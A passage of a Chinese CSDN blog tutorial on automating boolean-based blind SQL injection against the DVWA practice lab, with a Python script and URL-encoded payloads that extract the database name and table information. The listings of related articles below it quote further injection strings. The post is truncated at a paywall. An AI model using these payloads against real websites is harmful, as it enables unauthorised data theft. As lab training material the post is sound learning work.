基于DVWA靶场的盲注脚本

最新推荐文章于 2025-03-07 21:51:10 发布
最新推荐文章于 2025-03-07 21:51:10 发布
阅读量530 收藏 4
点赞数
文章标签: mysql 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/altersueyunsheng/article/details/117353730
版权
本文详细介绍了如何基于DVWA靶场进行布尔盲注和时间盲注的自动注入,主要针对low级别,通过猜解数据库名、表信息和字段数据来实现。在布尔盲注中,利用回显判断;而在时间盲注中,则观察页面加载时间变化来确认成功。整个过程包括数据库长度、表数量、字段名和数据的逐层猜解。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

基于DVWA的自动盲注脚本

本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。

布尔盲注

dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。

def judge_sql_inject(sql, url, headers):  # 返回判断,盲注
    str = f'?id={
     sql}&Submit=Submit#'
    printf("正在猜解:" + url + str)
    recv = requests.get(url + str, headers=headers).text
    try:
        if 'exists' in re.search('User ID.*?database', recv).group():
            return 1
        else:
            return 0
    except:
        return 0

猜解数据库名的过程,先猜解数据库的长度

databaselen = 0
for i in range(100):  # 猜解数据库长度
    printf("正在猜解数据库名长度...")
    sql = f"1'+and+length(database())%3D{
     i}%23"
    if judge_sql_inject(sql,url,headers) == 1:
        databaselen = i;
        break

for i in range(databaselen):  # 拆解数据库名
     for j in dic: # dic = 'abcdefghijklmnopqrstuvwxyz1234567890' 用于索引
         sql = f"1'+and+substr(database()%2C{
     i + 1}%2C1)%3D'{
     j}'%23" # 用substr来猜解每个位置的字符
         if judge_sql_inject(sql,url,headers) == 1:
             databasename += j
             break

下一步就是猜解数据库的表信息,首先猜解其有几张表,由于未知数量只能设置尽可能大一些的循环次数,以增加猜解的成功率,之后的循环也是基于这一方面的考虑。

table_num = 0
for i in range(99):  # 猜解数据库有几张表
    sql = f"1'+and+(select+count(table_name)+from+information_schema.tables+where+table_schema%3D'{
     databasename}')%3D{
     i}%23"
    # sql = f"1' and (select count(table_name) from information_schema.tables where table_schema='{databasename}')={i}#"
    if judge_sql_inject(sql,url,headers) == 1:
        table_num = i;
        break
printf("数据库" + databasename + "共有" + str(table_num) + "张表")
# 猜解所有表名长度
table_len = []
for i in range(table_num):
    for j in range(99):
        sql = f"1'+and+length(substr((select+table_name+from+information_schema.tables+where+table_schema%3D'
最低0.47元/天 解锁文章
筱昀笙
关注
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本
weixin_45116657的博客
08-25 6058
目录: 一、SQL SQL与SQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQL:SQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA靶场】Web安全之(布尔值/延时型)SQL(超详细教程)
weixin_60838266的博客
07-25 1669
SQL入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWA的SQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL测试
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
之布尔型
最新发布
2401_89233381的博客
03-07 728
在介绍布尔型之前我们需先了解回显与不回显。
dvwa为例学习简单sql布尔的详细脚本
Lethe's Blog
03-02 2710
0x01 前置知识 1.SQL入与SQL SQL入: 执行SQL入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL: 一般情况,执行SQL,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的) 一般在页面上不会直接显示sql执行的结果 ...
DVWA靶场-sql
zeroone的博客
03-11 1538
第八关:SQL Injection(Blind)       SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL。 Low <?php if( isset( $_GET[ 'Submit' ] )
DVWA】sql...
weixin_45378289的博客
07-02 214
sql没有返回数据库内容,所以要猜。 先猜长度,再猜字符 1’and length(database())>1 # 1’ and ascii(substr(database(),1,1))>1 # …好久好久 直接使用sqlmap来
DVWA靶场-SQL Injection (Blind)SQL
mlws1900的博客
03-19 1737
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场-Brute Force暴力破解
mlws1900的博客
03-12 1998
具体来说,它使用了mysqli_real_escape_string()函数对用户输入的用户名进行转义,确保特殊字符在SQL语句中不会被误解为SQL语句的一部分,从而保护数据库安全。进入暴力破解的界面,有点基础的都知道,在bp中通过字典,导入用户名和密码进行爆破,这样的操作大家见多了,再写没啥意思,想看的可以去pikachu靶场的暴力破解去了解具体操作,本文主要结合代码进行分析。3.high-高等安全等级,有安全措施保护,是中等安全等级的加深,这个等级下的安全漏洞可能不允许相同程度的攻击。
【渗透测试】——DVWA靶场搭建
wyb17870531028的博客
01-17 1322
【渗透测试】——DVWA靶场搭建
DVWA(七) - 使用python脚本实现SQL
qq_42785117的博客
09-02 3604
SQL Injection (Blind) sql其实就是sql入的一种,但是不会根据sql入的攻击语句返回你想要知道的信息. 分为两种: 布尔以及时间 布尔: 根据你的入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
(Windows10、XAMPP3.2.2、DVWA)搭建DVWA靶场&SQL入&SQL
coderge's 优快云 Blog.
09-06 1031
目录 一、任务内容 二、任务目的 三、参考方法 四、实验过程 4.1 了解SQL入原理 4.2 Windows搭建dvwa环境 4.3 SQL入实验过程 4.3.1 Low等级 4.3.2 Medium等级 4.3.3 High等级 4.3.4 Impossible等级 4.4 SQL入实验过程 4.4.1 Low级别 4.4.2 Midium级别 4.4.3 High级别 4.4.4 Impossible级别 五、实验总结 参考链接: 任务1:熟悉SQL入原
DVWA低级别下的SQL
qq_23667585的博客
11-04 1082
通过二进制逻辑获取DVWA低级别下SQL的用户名
DVWA学习日记-7 SQL
qq_29010757的博客
11-26 379
SQL 概述 数据库的执行结果不会直接显示在页面上 页面只会显示真和假两个状态 准备: Firefox DVWA Hackbar firebug Tamper Data SQLMAP 手工实战 1.进入简单模式 进入sql页面,正常操作访问id=1,,只是告诉我们这个存在,结果为真 2.输入-1提交一下,查询结果为假 3.尝试入POC 真 and 假=假 ... where user...
DVWA high python代码
weixin_48083470的博客
05-29 343
DVWA high python+burpsuite 高等级将输入和页面分离 使用burpsuite 分析页面工作原理 **代码很简单 没有使用二分查找 ** import requests url = "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" #url为显示页面的url keylist = [chr(i) for i in range(32, 127)] #包括数字、大小写字母、特殊字符 answer =
WEB手动漏洞挖掘-SQLDVWA实战)
含笑
05-20 6602
select * from table_name where id = ’ 1’ and 1=1– ’ 在里至少要有一个正确的结果;否则不显示; 1'order by 5--+ 1'order by 3--+1'union select 1,2--+ 1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),
DVWA靶机通关记-medium
qq_35258210的博客
01-26 571
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 1、暴力破解 2、远程系统命令执行 3、CSRF跨站请求伪造 4、文件包含 5、文件上传 7、sql入 8、sql 10、XSS(DO
基于dvwa的自动化sql脚本
altersueyunsheng的博客
05-27 557
基于DVWA的自动化脚本 SQL入 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 M
DVWA SQL-injection 附python脚本
weixin_30617561的博客
01-05 360
SQL-Injection low等级 首先我们将dvwa等级调到low 如图 接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果 接下来检测是否存在入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2 ...
新手必备DVWA靶场:全面学习web安全漏洞
资源摘要信息:"DVWA靶场环境是针对新手学习Web安全的一个重要教学资源,其全称为Dam Vulnerable Web Application,是一个专为Web漏洞教学和检测而设计的PHP和MySQL编写的Web脆弱性测试平台。DVWA提供了丰富的练习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值